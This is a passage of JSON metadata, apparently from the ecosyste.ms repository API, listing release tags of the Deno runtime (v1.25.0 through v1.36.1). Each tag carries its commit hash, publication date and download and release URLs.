o@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub